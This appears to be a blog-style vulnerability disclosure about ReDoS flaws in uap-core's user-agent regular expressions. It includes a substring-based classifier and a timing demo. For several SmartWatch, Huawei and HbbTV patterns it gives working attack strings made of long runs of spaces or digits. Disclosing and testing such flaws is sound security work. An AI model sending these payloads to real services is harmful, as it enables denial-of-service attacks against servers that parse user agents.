History of browser user-agent string
In my opinion, the best way to parse UAs (if it’s actually necessary) would be to use a big decision tree of if/else branches that search for the presence or absence of substrings within the UA.
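As a rough illustration of that idea, here is a minimal sketch of a substring-based decision tree. The function name `classify_browser` and the handful of browsers it covers are my own choices for the example. A real parser would need many more branches.

```python
def classify_browser(ua: str) -> str:
    """Classify a user-agent string with plain substring checks (no regex).

    Hypothetical helper for illustration only; it covers just a few browsers.
    """
    # Order matters: Edge and Opera UAs also contain "Chrome/", and Chrome UAs
    # also contain "Safari/", so the more specific tokens are tested first.
    if "Edg/" in ua:
        return "Edge"
    elif "OPR/" in ua:
        return "Opera"
    elif "Chrome/" in ua:
        return "Chrome"
    elif "Safari/" in ua:
        return "Safari"
    elif "Firefox/" in ua:
        return "Firefox"
    else:
        return "Other"


chrome_ua = (
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
)
print(classify_browser(chrome_ua))
```

Each `in` check is a linear-time substring search, so the worst case for the whole function is linear in the length of the UA, with no backtracking to worry about.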
What uap-core and its derivatives (uap-python, uap-ruby, etc.) do instead is run through a massive list of regular expressions. Unfortunately, regular expressions can be difficult to write correctly, reason about, code review and test. It’s easy to write an inefficient regular expression which matches what you want but has catastrophic worst-case performance on certain pathological input strings.
Each vulnerable regular expression reported here contains three adjacent, overlapping groups that can all match the same characters. When a match attempt fails, backtracking over them takes approximately cubic time with respect to the length of the user-agent string.
\bSmartWatch *\( *([^;]+) *; *([^;]+) *;
is vulnerable in portion ' *([^;]+) *'
and can be attacked with a long string of spaces
"SmartWatch(" + (" " * 3500) + "z"
SmartWatch( z
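To see the growth rate for yourself, the sketch below times Python's `re` module on scaled-down versions of the SmartWatch attack string. The helper name `time_search` and the chosen lengths are mine, and the absolute timings will vary by machine. If the behaviour is roughly cubic, doubling the number of spaces should multiply the time by about eight.

```python
import re
import time

# The SmartWatch pattern quoted above, compiled with Python's backtracking engine.
SMARTWATCH = re.compile(r"\bSmartWatch *\( *([^;]+) *; *([^;]+) *;")


def time_search(n_spaces: int) -> float:
    """Return the seconds spent failing to match an attack string with n_spaces spaces.

    Hypothetical helper for illustration only.
    """
    attack = "SmartWatch(" + (" " * n_spaces) + "z"
    start = time.perf_counter()
    result = SMARTWATCH.search(attack)
    elapsed = time.perf_counter() - start
    # The attack string contains no ';', so the pattern can never match it.
    assert result is None
    return elapsed


# Small sizes only: the 3500 spaces used in the report can take a very long time.
for n in (100, 200, 400):
    print(f"{n} spaces: {time_search(n):.4f} s")
```

The lengths are deliberately kept far below 3500 so the script finishes quickly.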
; *([^;/]+) Build[/ ]Huawei(MT1-U06|[A-Z]+\d+[^\);]+)[^\);]*\)
is vulnerable in portion '\d+[^\);]+[^\);]*'
and can be attacked with
";A Build HuaweiA" + ("4" * 3500) + "z"
(HbbTV)/[0-9]+\.[0-9]+\.[0-9]+ \([^;]*; *(LG)E *; *([^;]*) *;[^;]*;[^;]*;\)
is vulnerable in portion ' *([^;]*) *'
and can be attacked with
"HbbTV/0.0.0 (;LGE;" + (" " * 3500) + "z"
(HbbTV)/[0-9]+\.[0-9]+\.[0-9]+ \([^;]*; *(?:CUS:([^;]*)|([^;]+)) *; *([^;]*) *;.*;
is vulnerable in portions ' *(?:CUS:([^;]*)|([^;]+)) *'
and ' *([^;]*) *'
and can be attacked with
"HbbTV/0.0.0 (;CUS:;" + (" " * 3500) + "z"
"HbbTV/0.0.0 (;" + (" " * 3500) + "z"
"HbbTV/0.0.0 (;z;" + (" " * 3500) + "z"